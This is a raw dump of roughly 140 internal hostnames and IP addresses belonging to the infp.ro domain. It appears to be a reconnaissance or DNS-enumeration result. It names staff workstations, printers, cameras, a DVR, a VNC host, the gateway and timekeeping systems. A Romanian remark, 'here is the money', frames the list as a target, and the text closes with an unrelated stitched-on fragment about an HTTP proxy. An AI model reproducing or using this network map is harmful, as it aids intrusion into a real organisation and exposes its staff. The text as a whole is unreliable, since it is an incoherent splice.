daniela.infp.ro 91.212.254.117 elist.infp.ro 91.212.254.12 reakt.infp.ro 91.212.254.12 pc-rtlc.infp.ro 91.212.254.21 dragos-t.infp.ro 91.212.254.93 epopescu1.infp.ro 91.212.254.206 viorel2.infp.ro 91.212.254.75 matlab.infp.ro 91.212.254.114 ws1.infp.ro 91.212.254.42 tmp01-dc02-buc.infp.ro 91.212.254.254 seismic-archive.infp.ro ? printer-dc.infp.ro 91.212.254.173 hle.infp.ro 91.212.254.151 dragao.infp.ro 91.212.254.251 geta.infp.ro 91.212.254.112 star.infp.ro 91.212.254.120 elabor.infp.ro 91.212.254.121 dragos-toma.infp.ro 91.212.254.143 seismos.infp.ro 91.212.254.249 niep-links.infp.ro 91.212.254.110 esnet.infp.ro 91.212.254.10 felix-ndc.infp.ro 91.212.254.204 anca-p.infp.ro 91.212.254.97 synology-dragos.infp.ro 91.212.254.225 lm2.infp.ro 91.212.254.70 ioana-c.infp.ro 91.212.254.155 chitaru2.infp.ro 91.212.254.216 www-old.infp.ro 91.212.254.3 cadriana.infp.ro 91.212.254.193 simage.infp.ro 91.212.254.13 eida-sc3.infp.ro 91.212.254.243 ncristi.infp.ro 91.212.254.95 cristina.infp.ro 91.212.254.139 gica.infp.ro 91.212.254.160 hermes.infp.ro 91.212.254.16 www.infp.ro 91.212.254.212 a-marmur.infp.ro 91.212.254.161 acteon2.infp.ro 91.212.254.90 ccioflan-mac.infp.ro 91.212.254.144 dvr-infp.infp.ro 91.212.254.209 tita.infp.ro 91.212.254.153 alertafeedback.infp.ro 91.212.254.236 a-marmur2.infp.ro 91.212.254.162 eddie.infp.ro 91.212.254.164 astarte-ro.infp.ro 91.212.254.10 pc-vnc.infp.ro 91.212.254.171 flori.infp.ro 91.212.254.138 atlas2.infp.ro 91.212.254.248 ncristi2.infp.ro 91.212.254.92 bgrecu2.infp.ro 91.212.254.108 gabi.infp.ro 91.212.254.148 scdev.infp.ro 91.212.254.124 proiector2.infp.ro 91.212.254.132 cat2.infp.ro 91.212.254.40 alice.infp.ro 91.212.254.145 pma.w1.infp.ro 91.212.254.10 m.infp.ro 91.212.254.29 ews-pc3.infp.ro 91.212.254.186 display-emsc.infp.ro 91.212.254.26 anca.infp.ro 91.212.254.172 pirvu2.infp.ro 91.212.254.86 qbs-gsm.infp.ro 91.212.254.29 wifi-ndc.infp.ro 91.212.254.167 tanta.infp.ro 91.212.254.152 victorin2.infp.ro 91.212.254.146 bogdan-z.infp.ro 91.212.254.103 infp-gw.infp.ro 91.212.254.1 liviu.infp.ro 91.212.254.111 tmon.infp.ro 91.212.254.10 dacea.infp.ro 91.212.254.18 sap-dac.infp.ro 91.212.254.22 fb.infp.ro 91.212.254.10 maria-const.infp.ro 91.212.254.157 infp.infp.ro 91.212.254.3 core01.infp.ro 91.212.254.213 m-ivan.infp.ro 91.212.254.80 pontaj.infp.ro 91.212.254.222 liviu-dev1.infp.ro 91.212.254.111 pc-elist.infp.ro 91.212.254.165 marine.infp.ro 91.212.254.10 amo.infp.ro 91.212.254.245 l-muntean.infp.ro 91.212.254.73 daring.infp.ro 91.212.254.10 zina.infp.ro 91.212.254.134 antelope-ws.infp.ro 91.212.254.7 electro.infp.ro 91.212.254.67 hyperion.infp.ro 91.212.254.183 gpslm.infp.ro 91.212.254.191 lampa-avert.infp.ro 91.212.254.187 asis.infp.ro 91.212.254.8 gchircea-lap.infp.ro 91.212.254.99 fisiere.infp.ro 91.212.254.12 feedback.infp.ro 91.212.254.236 daniela-lap.infp.ro 91.212.254.116 alexandra-m.infp.ro 91.212.254.104 kb.infp.ro 91.212.254.12 uds1.infp.ro 91.212.254.203 printer-mihaela.infp.ro 91.212.254.137 camera-bib.infp.ro 91.212.254.174 ccioflan.infp.ro 91.212.254.89 gps1-5l.infp.ro 91.212.254.14 fane.infp.ro 91.212.254.142 angela.infp.ro 91.212.254.122 eida.infp.ro 91.212.254.244 florym.infp.ro 91.212.254.224 mioarap.infp.ro 91.212.254.113 ews-pc1.infp.ro 91.212.254.25 mihaela2.infp.ro 91.212.254.147 infpmap.infp.ro 91.212.254.190 eida-routing.infp.ro 91.212.254.243 alarm.infp.ro 91.212.254.17 felix-b.infp.ro 91.212.254.102 contas.infp.ro 91.212.254.246 hercules.infp.ro 91.212.254.242 cms.infp.ro 91.212.254.41 venus.infp.ro 91.212.254.7 pc-proiectoare.infp.ro 91.212.254.77 www.resyr.infp.ro 91.212.254.10 viorel3.infp.ro 91.212.254.76 pc-video-cam.infp.ro 91.212.254.158 felix4.infp.ro 91.212.254.192 zap.infp.ro 91.212.254.214 aici sunt banii....

standard description. On the HTTP proxy works fine. // link removed